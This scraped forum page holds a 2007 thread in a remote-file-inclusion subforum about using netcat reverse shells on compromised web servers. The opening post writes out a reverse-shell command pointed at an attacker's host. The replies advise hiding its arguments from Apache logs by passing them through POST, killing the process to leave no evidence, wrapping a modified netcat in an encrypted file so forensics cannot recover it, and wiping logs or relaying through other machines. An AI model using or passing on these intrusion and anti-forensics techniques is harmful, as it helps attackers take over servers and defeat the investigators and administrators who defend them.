Waraxe IT Security Portal
Login or Register
December 1, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 39
Members: 0
Total: 39
Full disclosure
SEC Consult SA-20241127-0 :: Stored Cross-Site Scripting in Omada Identity (CVE-2024-52951)
SEC Consult SA-20241125-0 :: Unlocked JTAG interface and buffer overflow in Siemens SM-2558 Protocol Element, Siemens CP-2016 & CP-2019
Re: Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Remote file inclusion -> reverse shell tradeoff
Post new topicReply to topic View previous topic :: View next topic
reverse shell tradeoff
PostPosted: Tue Jun 05, 2007 7:28 pm Reply with quote
drag
Active user
Active user
Joined: May 31, 2007
Posts: 25




I was doing some reading on old posts and noticed multiple threads that suggest using a reverse shell with netcat. Although this seems quite useful (using the php shell sucks in some ways compared to a real one, and to bypass logs), it seems to me that there is a tradeoff. Using the reverse shell opens by using:

netcat -e /bin/sh yourhost 3333

necessitates you placing your source address into a running process. I'd imagine that this is more noticeable than having it within the logs (depending on the admin). Am I missing something that would make this more stealthy? Any comments?
View user's profile Send private message
PostPosted: Fri Jun 08, 2007 1:29 pm Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




the idea is, by using a reverse shell u would able to execute a shell rather than put some shell backdoor on victim (because a rule at victims firewall), you know sometimes you need to execute some command on victim box.

I agree, your ip will be logged, but do you think your connection (accessing the web for some php remote file inclusion) arent log either ?

so, u need some "covering track" mechanism, old time ago there was a
remove.c" , i think u can find a toushand or u can made one,

or, u could find some machine in some "other place" to receive your "reverse shell"

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
Re: reverse shell tradeoff
PostPosted: Fri Jun 08, 2007 10:23 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




drag wrote:
I was doing some reading on old posts and noticed multiple threads that suggest using a reverse shell with netcat. Although this seems quite useful (using the php shell sucks in some ways compared to a real one, and to bypass logs), it seems to me that there is a tradeoff. Using the reverse shell opens by using:

netcat -e /bin/sh yourhost 3333

necessitates you placing your source address into a running process. I'd imagine that this is more noticeable than having it within the logs (depending on the admin). Am I missing something that would make this more stealthy? Any comments?


First: if we want to "execute" netcat from php's exec() or system(), then by using POST method for delivering commandline arguments for netcat we can probably evade logging host and port to apache logs.

Second: after shell using netcat process must be killed. So no evidence stays.

Still I have vision for more paranoid uses:

Let's assume, that netcat is encrypted and wrapped to external file, which will receive encryption key from $_POST or $_COOKIE vector and then will unpack payload, containing netcat. And netcat itself is modified version, which has all needed information inside, so it does not need any command line parameters.

If somehow that encrypted file stays to hdd (if attacker for some reason forgets to delete traces), then it is practically impossible to decrypt it, because the key is unknown and can't be found from Apache logs.

Conclusion - best tools are manually modified and improved opensource tools Wink
View user's profile Send private message Send e-mail Visit poster's website
Re: reverse shell tradeoff
PostPosted: Sun Jun 10, 2007 2:52 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




waraxe wrote:

First: if we want to "execute" netcat from php's exec() or system(), then by using POST method for delivering commandline arguments for netcat we can probably evade logging host and port to apache logs.

Second: after shell using netcat process must be killed. So no evidence stays.

Still I have vision for more paranoid uses:

Let's assume, that netcat is encrypted and wrapped to external file, which will receive encryption key from $_POST or $_COOKIE vector and then will unpack payload, containing netcat. And netcat itself is modified version, which has all needed information inside, so it does not need any command line parameters.

If somehow that encrypted file stays to hdd (if attacker for some reason forgets to delete traces), then it is practically impossible to decrypt it, because the key is unknown and can't be found from Apache logs.

Conclusion - best tools are manually modified and improved opensource tools Wink


CMIIW, So i think waraxe try to say "made your own tools for e.g your own netcat" Smile, its an unusual ways so its hard to trace (by IDS, IPS, rkhunter tools and other dig forensic tools because it wouldnt be in there database/pattern).

but as far as i know, being anonymous is not "always" without a log, i rather fake it or use another "character"

SOL

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
reverse shell tradeoff
www.waraxe.us Forum Index -> Remote file inclusion
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.056 Seconds